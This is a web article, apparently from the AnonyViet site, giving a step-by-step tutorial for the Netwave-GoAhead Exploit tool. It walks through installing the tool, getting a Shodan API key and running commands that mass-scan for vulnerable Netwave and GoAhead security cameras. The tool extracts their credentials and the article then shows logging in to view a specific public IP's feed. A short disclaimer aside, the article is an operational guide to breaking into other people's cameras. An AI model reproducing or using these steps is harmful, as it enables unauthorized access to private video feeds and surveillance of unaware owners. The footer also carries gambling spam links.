• Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
AnonyViet - English Version
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
No Result
View All Result
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
No Result
View All Result
AnonyViet - English Version
No Result
View All Result

How to use Netwave-GoAhead Exploit to exploit security camera vulnerabilities

AnonyViet by AnonyViet
January 26, 2023
in Security
0

In the article “Exercise: Use ZoomEye to access the vulnerable Camera CVE-2018-9995“We can easily find many cameras that still have unpatched vulnerabilities. However, there is still a Tool called Netwave-GoAhead Exploit that helps to find another type of Vulnerable Security Camera.

Join the channel Telegram of the AnonyViet 👉 Link 👈

About Tools

This tool was created and developed by Kien Quoc. The tool has the main function of finding IP and checking 2 types of Cameras, Netware IP and GoAhead, to see if there are any vulnerabilities. From there hack into the camera and view the camera through your Browser.

Instructions on how to use Netwave-GoAhead Exploit

Note: the article is for research purposes only, it is strictly forbidden to use it for illegal purposes. In case the camera is found to be flawed, immediately notify the owner to quickly fix it.

Install tools

Step 1: Update your Linux and install Python 3 and Pip 3 for me

sudo apt update
sudo apt install Python3.9.6
(The latest version since the release of this article is 3.9.6. You can check it out on the Python homepage!)
sudo apt-get update
sudo apt-get -y install python3-pip

Step 2: Install Netware-GoAhead Exploit tool

sudo git clone https://github.com/kienquoc102/Netwave-GoAhead-Exploits 

Step 3: Go to the file and install the necessary packages

cd Netwave-GoAhead-Exploits

pip3 install -r ./related.txt

Register an account in Shodan.io

Shodan.io is a search engine that allows users to find specific types of computers connected to the internet using various filters. In this article, Shodan acts as an ip finder and filter for you to see which ip can be attacked.

Step 1: Go to Shodan.io here

Step 2: Select SIGN UP NOW

Step 3: Select Register in the upper corner

Step 4: Enter login information

Enter Shodan.io login information

Step 5: Go to email Verify with Shodan.io

Step 6: Go to account.shodan.io here.

Pay attention to the API key

Shodan API key

Find Vulnerable Cameras with Shodan API key

Enter the following command

python3 exploit.py -b 2 -v --shodan [nhập cái API key của shodan vào đây]

My example would be

python3 exploit.py -b 2 -v --shodan rrgYhgIMtnrPtfKdiVvWKtyQyY94goA0

run Netwave-GoAhead Exploit

It will run as follows

Run Tool

The task you just need to wait for it to produce such results

Camera search results

Now I will try to log in to ip address 181.56.97.61 with port 80

Enter username and password

It will prompt you to enter your username and password. Just based on what the tool says

An example of this would be

  • Username: admin
  • Password: 123456

Result

Camera hacking results Camera hacking results

Sometimes you will encounter some cases like this

[+]The ip:192.168.120.1,port:81,username:Location: /admin (Example IP)
[+]The ip:192.168.120.1,port:81,password:<meta name="generator" content="vBulletin 5.5.4" />

For this ip, please help me remove it because it is not the IP Address of the Camera

Access Camera using available IP

With 1 IP address available port

You run yourself the following command

python3 exploit.py -b 1 -i [IP:PORT] -v

For example, I have

python3 exploit.py -b 1 -i 192.168.1.5:80 -v

Inside

IP address is 192.168.1.5

Port is 80

With IP list with port

You use the following command for yourself

python3 exploit.py -b 2 -l iplist.txt -v

Inside

iplist.txt is the file containing the ip address in the form: [IP:PORT]

Eg: 192.168.1.5:80

Target IP : 192.168.1.5

Port aimed at: 80

For this way, it will be easy to attack on an address that you already know or if you have an IPlist available, using the following way to check is a very effective way. Using Shodan is also possible but it will check for many strange ips that have been published on the network.

So I just finished the tutorial on how to find and attack the camera with the Python tool. If you have a good article, don’t hesitate to send an article contribution via email [email protected], we will edit and post it. See also: Exercise: Use ZoomEye to find vulnerable cameras CVE-2018-9995 here.

The article achieved: 5/5 – (100 votes)

Tags: CameraexploitNetwaveGoAheadsecurityVulnerabilities
Previous Post

Lesson 70: How to create a drop-down menu in Excel

Next Post

How to sell old documents on Studypool to earn extra income

AnonyViet

AnonyViet

Related Posts

How to implement Shellcode Injection attack technique with Autoit
Security

How to implement Shellcode Injection attack technique with Autoit

March 14, 2025
How to exploit the holy hole of Hijacking on Windows
Security

How to exploit the holy hole of Hijacking on Windows

March 8, 2025
Hamamal: Shellcode execution technique from afar to overcome Antivirus's discovery
Security

Hamamal: Shellcode execution technique from afar to overcome Antivirus's discovery

February 10, 2025
Snov.io Email Finder: Search emails with only company name/domain name/LinkedIn profile
Security

Snov.io Email Finder: Search emails with only company name/domain name/LinkedIn profile

December 14, 2024
Capsolver: Automatic solution solution for business
Security

Capsolver: Automatic solution solution for business

December 12, 2024
Seekr: Collect & manage OSINT data
Security

Seekr: Collect & manage OSINT data

November 22, 2024
Next Post
How to sell old documents on Studypool to earn extra income

How to sell old documents on Studypool to earn extra income

0 0 votes
Article Rating
Subscribe
Login
Notify of
guest

guest

0 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments

Recent News

Top 5 game programming languages ​​to learn now

Top 5 game programming languages ​​to learn now

June 8, 2025
The iPhone list is updated with iOS 26

The iPhone list is updated with iOS 26

June 8, 2025
Discover the glowing effect next to the iPhone ios 18 screen

Discover the glowing effect next to the iPhone ios 18 screen

June 8, 2025
[Godot Shooter] #2: Creating characters & shooting bullets

[Godot Shooter] #2: Creating characters & shooting bullets

June 7, 2025
Top 5 game programming languages ​​to learn now

Top 5 game programming languages ​​to learn now

June 8, 2025
The iPhone list is updated with iOS 26

The iPhone list is updated with iOS 26

June 8, 2025
Discover the glowing effect next to the iPhone ios 18 screen

Discover the glowing effect next to the iPhone ios 18 screen

June 8, 2025
AnonyViet - English Version

AnonyViet

AnonyViet is a website share knowledge that you have never learned in school!

We are ready to welcome your comments, as well as your articles sent to AnonyViet.

Follow Us

Contact:

Email: anonyviet.com[@]gmail.com

Main Website: https://anonyviet.com

Recent News

Top 5 game programming languages ​​to learn now

Top 5 game programming languages ​​to learn now

June 8, 2025
The iPhone list is updated with iOS 26

The iPhone list is updated with iOS 26

June 8, 2025
  • Home
  • Home 2
  • Home 3
  • Home 4
  • Home 5
  • Home 6
  • Next Dest Page
  • Sample Page

©2024 AnonyVietFor Knowledge kqxs hôm nay xem phim miễn phí SHBET https://kubet88.yoga/ bj88

No Result
View All Result
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office

©2024 AnonyVietFor Knowledge kqxs hôm nay xem phim miễn phí SHBET https://kubet88.yoga/ bj88

wpDiscuz
0
0
Would love your thoughts, please comment.x
()
x
| Reply